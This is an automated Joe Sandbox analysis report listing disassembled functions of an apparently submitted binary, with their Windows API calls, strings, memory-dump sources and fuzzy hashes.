Instruction Fuzzy Hash: 89C137B6A183418FC354CF29D89065AFBE1BFC8308F19892DE998D7311D734E949CB96

Function 0037F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0037F3A5), ref: 0037F9DA

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ab92d4b5e61dc3e3e5092995adf1aa0459d0e4d48163b0d351d87645208842d9
Instruction ID: 1792c0a2e0302bc17e3b88a26aec8b67dd7a7b01ccd496880558769e347e56ba
Opcode Fuzzy Hash: ab92d4b5e61dc3e3e5092995adf1aa0459d0e4d48163b0d351d87645208842d9
Instruction Fuzzy Hash:

Function 0038C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0038C030

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: c1464a5fc37cf73e9433e0a4546573eaff93edd5ba7f9e5ecb3edb1e34220da2
Instruction ID: 9ab79297a62fbc30280236ab9e85274a915ab427ccad4bba9e23498551e69d84
Opcode Fuzzy Hash: c1464a5fc37cf73e9433e0a4546573eaff93edd5ba7f9e5ecb3edb1e34220da2
Instruction Fuzzy Hash: 99A011B02022008B83028F30AE08A0A3AACAA00380B08002BA00AC0030EAA088A0AB00

Function 003762CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction ID: b3995e20b677407f7601c1f8f831700854c91e2e52fe41cec7e34f26fa9fb912
Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction Fuzzy Hash: 9C62F771604B859FCB26CF28C4A16B9BBE1AF95304F09C96DD8DE8B742D738E944CB11

Function 003777EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction ID: 58d506998e48573843da9c43beaacaf8d3f69681002bb5435035d4b54b52a8d2
Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction Fuzzy Hash: C962F7716083459FCB26CF28C8806B9BBE1BF99304F09C96DE89E8B746D734E945CB11

Function 0036F461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction ID: 946b010ea1aed0ff135ccf605b8cc071c2d6367cd05fe7313f55c6aaae8e6347
Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction Fuzzy Hash: 29524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Function 00377153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42d9586ebb42a9cf7abdc7323e9034dc7e167f2c854d3b2aa395bab966b1fa25
Instruction ID: 0423c085308683a302fd665b8909dd04c6a59aee34b955bddc8f810ee3e4723e
Opcode Fuzzy Hash: 42d9586ebb42a9cf7abdc7323e9034dc7e167f2c854d3b2aa395bab966b1fa25
Instruction Fuzzy Hash: 9412D6B16187069FC72ACF28C490679B7E1FF94304F10892EE99AC7781E338E555DB45

Function 0036C426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce974bf8a3c5c88f282c71c0424c8b8ecbb83ccc4c962fba693f84f1f08f4bf3
Instruction ID: c8f55f8d02c8417de349a875c903d38af384d42ef3bd84cf808147767d7a8a76
Opcode Fuzzy Hash: ce974bf8a3c5c88f282c71c0424c8b8ecbb83ccc4c962fba693f84f1f08f4bf3
Instruction Fuzzy Hash: C3F1CD316283018FC716CF28C49863ABBE5EF89314F15AA2EF4C5D725AD730E905CB56

Function 00376CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2980be0e212b7233c95cb586bc08cdf2d70386884da6558b15a1596fe5d8ca77
Instruction ID: c50022afca3cb80faf81fc769043b4e1fa87ac960c36e09b86b8cdfe295d1514
Opcode Fuzzy Hash: 2980be0e212b7233c95cb586bc08cdf2d70386884da6558b15a1596fe5d8ca77
Instruction Fuzzy Hash: BBD1F4716087408FDB35CF28C85175BBBE0BF89308F09856DE88D9B642D778E909CB56

Function 0036E9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93699971d7bf4f42b260e625c8a681fec5b76b1457b1feb0ae363b432b84952a
Instruction ID: 6578b4bac643d61e9ca5edfefde6a1cc9ed8c02bc29746f3fa8ed1a21c48e081
Opcode Fuzzy Hash: 93699971d7bf4f42b260e625c8a681fec5b76b1457b1feb0ae363b432b84952a
Instruction Fuzzy Hash: A6E126755083908FC345CF29D89486ABFF0AF9A300F49495EF9C497392C335EA19DB92

Function 00374088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: 2247c7723b00381923a6da82b8c1b2c642ab69dbfac614734133eb4a7eae6201
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: C29189B02047498BDB36EF64D890BBE77C9EB50300F10892DF59ECB282EB38A555C752

Function 003743BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 99e896decbdc2d6bd74e0cdc6011dff598a8761deba24938c1442c78236e65b0
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: D38168713043468BDB37DE68C8C0BBD77D4AB91304F00C92DE98E8F682DB78A9859752

Function 003851C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a130b21aa496ec926d489e722fc6376dc6859589348575b2a43d2eb38fbb2a5a
Instruction ID: 94c5a9e9b14853bf4165cab5d92a55baeed07fefc909ae04f50859596e072757
Opcode Fuzzy Hash: a130b21aa496ec926d489e722fc6376dc6859589348575b2a43d2eb38fbb2a5a
Instruction Fuzzy Hash: 3661BB39640F0857DF3BBA786891BBE6398EF51340F550DDAE483DF681DA91DD428301

Function 00384F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: 55c5bcb4755805645e37a1da21db674f441d3c9b61e31c8d0aa0394d41e8376b
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: CB517BA1204F4557DF377A28895ABBF23C99B12304F1909DDE983DFA82C605EE05C3D1

Function 0036EFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4403c1aefed5637abd8dfc2c35a67a22c78d3ba6d9dc80744688a0e0892956ec
Instruction ID: b3da9c58fa09853c9897c296bc10e42c5ba5c04167eab488504b9535123dc11c
Opcode Fuzzy Hash: 4403c1aefed5637abd8dfc2c35a67a22c78d3ba6d9dc80744688a0e0892956ec
Instruction Fuzzy Hash: DC51F3315093D58FC703CF39D55046EBFE0AE9A314F4A49ADE4D95B247C231DA4ACB62

Function 003700B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdbed9b5303bb61bc775235c42beefd1d6a1ff618febf51a01ffa4ca50a681cf
Instruction ID: 0ae6c66e3ba1449e58d4d1605877ed70236333c659a3555adbb7b9efe06b48ab
Opcode Fuzzy Hash: bdbed9b5303bb61bc775235c42beefd1d6a1ff618febf51a01ffa4ca50a681cf
Instruction Fuzzy Hash: 4E51E0B1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3340D734E959CB96

Function 00373E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: c40d61874474d8868eeee055ce3860808490de3be8a899477b5b23bf40404cb0
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: E131D5B2A147568FCB25DF28C85116ABBE0FB95304F10852DE499D7741C739EA0ACB92

Function 0036E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0036E30E

Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5

Part of subcall function 00371DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,003A1030,00000200,0036D928,00000000,?,00000050,003A1030), ref: 00371DC4

_strlen.LIBCMT ref: 0036E32F
SetDlgItemTextW.USER32(?,0039E274,?), ref: 0036E38F
GetWindowRect.USER32(?,?), ref: 0036E3C9
GetClientRect.USER32(?,?), ref: 0036E3D5
GetWindowLongW.USER32(?,000000F0), ref: 0036E475
GetWindowRect.USER32(?,?), ref: 0036E4A2
SetWindowTextW.USER32(?,?), ref: 0036E4DB
GetSystemMetrics.USER32(00000008), ref: 0036E4E3
GetWindow.USER32(?,00000005), ref: 0036E4EE
GetWindowRect.USER32(00000000,?), ref: 0036E51B
GetWindow.USER32(00000000,00000002), ref: 0036E58D

Strings

$%s:, xrefs: 0036E302
t9, xrefs: 0036E34A
CAPTION, xrefs: 0036E4BD
d, xrefs: 0036E3F5

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d$t9
API String ID: 2407758923-2433586919
Opcode ID: 4fab73c9f98abac5aae20e51391c96fceb18f4fd1623dbe1570df70694637336
Instruction ID: f4dbd80d3ccb0fd6d38cf860c576374aace6694f3306b8eebe65834430a55f25
Opcode Fuzzy Hash: 4fab73c9f98abac5aae20e51391c96fceb18f4fd1623dbe1570df70694637336
Instruction Fuzzy Hash: 1181B272208301AFD712DF68CC89E6FBBE9EF88704F04491DFA85D7254D671E9098B52

Function 0038CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0038CB66

Part of subcall function 0038C701: _free.LIBCMT ref: 0038C71E
Part of subcall function 0038C701: _free.LIBCMT ref: 0038C730
Part of subcall function 0038C701: _free.LIBCMT ref: 0038C742
Part of subcall function 0038C701: _free.LIBCMT ref: 0038C754
Part of subcall function 0038C701: _free.LIBCMT ref: 0038C766
Part of subcall function 0038C701: _free.LIBCMT ref: 0038C778
Part of subcall function 0038C701: _free.LIBCMT ref: 0038C78A
Part of subcall function 0038C701: _free.LIBCMT ref: 0038C79C
Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7AE
Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7C0
Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7D2
Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7E4
Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7F6

_free.LIBCMT ref: 0038CB5B

Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4

_free.LIBCMT ref: 0038CB7D
_free.LIBCMT ref: 0038CB92
_free.LIBCMT ref: 0038CB9D
_free.LIBCMT ref: 0038CBBF
_free.LIBCMT ref: 0038CBD2
_free.LIBCMT ref: 0038CBE0
_free.LIBCMT ref: 0038CBEB
_free.LIBCMT ref: 0038CC23
_free.LIBCMT ref: 0038CC2A
_free.LIBCMT ref: 0038CC47
_free.LIBCMT ref: 0038CC5F

Strings

h9, xrefs: 0038CC0E

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
